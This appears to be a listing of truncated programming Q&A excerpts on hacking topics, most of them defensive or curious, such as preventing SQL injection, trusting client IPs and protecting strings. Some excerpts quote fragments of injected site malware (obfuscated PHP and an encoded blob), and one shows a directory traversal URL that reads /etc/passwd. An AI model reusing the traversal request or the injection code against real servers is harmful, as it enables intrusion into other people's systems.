Good ethical hacking book
What is the best book to start learning ethical hacking ? ...
hacking
Session Hijacking in practice
I have been reading up on session fixing/hijacking recently, and understand the theory. What I don't understand is how this would be exploited in practice. Would you have to tamper with your browser to make use of the stolen cookies? Append it to the URL and pass it to the web application? Or would you write some sort of custom script ...
From the perspective of an ASP.Net web form, can the Request.UserHostAddress be trusted?
I have a web form that needs to act differently if the request to that form came from an internal network address or from a public IP address. I'm trying within my web form to determine if the request is from an internal network IP. Can I reliably do this, or can clients fake their source IP? Can I trust the information contained in R...
A bot to Access data on grid of a windows application (like a human)
I'm so desperate to use a vpn application. In this app there are some limitations that I've found no solutions for them for example multiple users can connect to the vpn server using one username at the same time. In order to stop that I have to look at the 'connected vpn clients' and see if a username exists more than once and then disc...
URL based Javascript to show all variables in the page
Hi, I've seen javascript (and written some too) to show the contents of input tags (useful if the guy before you left a password in an input...), but I want to use JS to show the Javascript variables that exist in the page. The reason I want to do this is because I want to check out a file sharing site to see if it's real or just a roo...
bootstrap(index.php) "viagra" hack
ok...so most of the sites we were serving were down, parsing errors in the index.php file...looking at the file, our previous versions of the said file were prepended with: <?php @register_shutdown_function("__sfd1260709780__");function __sfd1260709780__() { global $__sdv1260709780__; if (!empty($__sdv1260709780__)) return; $__sdv126070...
Odd code added just before close body tag
My client is reporting that code looking like this has been automatically added to the end of all PHP files (just before the close body tag): <b1><!--J5qN2aS2eNoNycENgCAMAMCNqEoUnYZA04DRUgI1rC+f+xxwUdDQEuliwe5u3U+wzm3HBWMMkxpR0Qnmr2E2KAyDIqAUnQGM3H0NiXwUed67q6m5/t4jHpA=--></b1> He tried manually deleting that line, but of course it re...
Protecting strings within a Delphi application
We have a Delphi 2006 application that drives a MS SQL Server database. We have found a vulnerability where it is possible to load the executable into a hex editor and modify the SQL. Our long term plan is to move this SQL to CLR stored procedures but this is some way off since many of our clients still use SQL 2000. We've thought ab...
Hooking DirectX EndScene from an injected DLL
I want to detour EndScene from an arbitrary DirectX 9 application to create a small overlay. As an example, you could take the frame counter overlay of FRAPS, which is shown in games when activated. I know the following methods to do this: Creating a new d3d9.dll, which is then copied to the games path. Since the current folder is sea...
Is is possible to spoof a session with JavaScript + Cookies?
Suppose you have a webapp that gives users their own site on a subdomain (eg: awesome.super-cms.com) and that you let them edit HTML. Further assume that you're setting the SessionID in a wildcard subdomain cookie ("*.super-cms.com") The user who manages evil.super-cms.com could easily write a JavaScript that grabs the SessionID from o...
PHP - writing data to a file with 777 permission
I have a .TXT file in a web-server with the permission as 777. So what are the changes that others might be able to edit the content of this file? The content is not much - just a number. Someone seems to have been tinkering with this file as the number vanished the other day! No one else except me has the FTP password. So I was wonderi...
cell phone hacking (as in engineering hack)
hi. my apologized right away if it is not really programming related question. I have a (crazy?) idea of using cellphone voice channel as remote control channel for RC models/drones. in principle if it is doable, it should increase the range a lot. Data data channels on most cell phone companies are more expensive than pure voice chan...
Strange Value in EXE header!
I've seen a strange value placed in EXE header 00000000 :4D 5A 90 00 03 00 00 00 - 04 00 00 00 FF FF 00 00 00000010 :B8 00 00 00 00 00 00 00 - 40 00 00 00 00 00 00 00 00000020 :00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 00000030 :00 00 00 00 00 00 00 00 - 00 00 00 00 A8 00 00 00 00000030 :00 00 00 00 00 00 00 00 - 00 00 00 00 A...
How can I avoid SQL injection attacks?
Yesterday I was speaking with a developer, and he mentioned something about restricting the insertions on database field, like, strings such as -- (minus minus). At the same type, what I know is that is a good approach to escape HTML chars like <, > etc. Not --. Is this true? Do I have to worry about --, ++? Is it more like a myth or ol...
Hooking str.__getitem__ in Python
Is there a way of hooking str.__getitem__? Example: I'd like to be capable of do: >>> "this is a string"[[1,3,4]] 'hs ' passing a list to [] and get the items in that list. A more realistic example: class STR(str): pass class INT(int): pass It's easy to make that STR("a string")[1] or STR("a string")[INT(1)] return an S...
java ternary hack
So I'm not going for maintainability or elegance here.. looking for a way to cut down on the total tokens in a method just for fun. The method is comprised of a long nested if-else construct and I've found that (I think) the way to do it with the fewest tokens is the ternary operator. Essentially, I translate this: String method(param) ...
Do any real-world CPUs not use IEEE 754?
I'm optimizing a sorting function for a numerics/statistics library based on the assumption that, after filtering out any NaNs and doing a little bit twiddling, floats can be compared as 32-bit ints without changing the result and doubles can be compared as 64-bit ints. This seems to speed up sorting these arrays by somewhere on the ord...
Using directory traversal attack to execute commands
Is there a way to execute commands using directory traversal attacks? For instance, I access a server's etc/passwd file like this http://server.com/..%01/..%01/..%01//etc/passwd Is there a way to run a command instead? Like... http://server.com/..%01/..%01/..%01//ls ..... and get an output? EDIT: To be clear here, I've found the ...
Can an attacker take advantage of HTML tag injection in request parameters?
Say I have a web application that accepts a parameter called "content". Whatever is present in this parameter will be output as a part of the HTML response. Example JSP code: <%= request.getParameter("content") %> I know this is silly and it should be sanitized and so on, but my question is if an attacker can actually take advantage ...
Where to use mysql_real_escape_string to prevent SQL Injection?
Hi friends, I'm in trouble with a group of hackers. they hacked my client's site few times, and my client gets more angry :( my client lost his database (which has hundreds records), and had to enter all :( now I'm following some more introductions; fixed file permissions changed ftp and host login info cleared all remote mysql acce...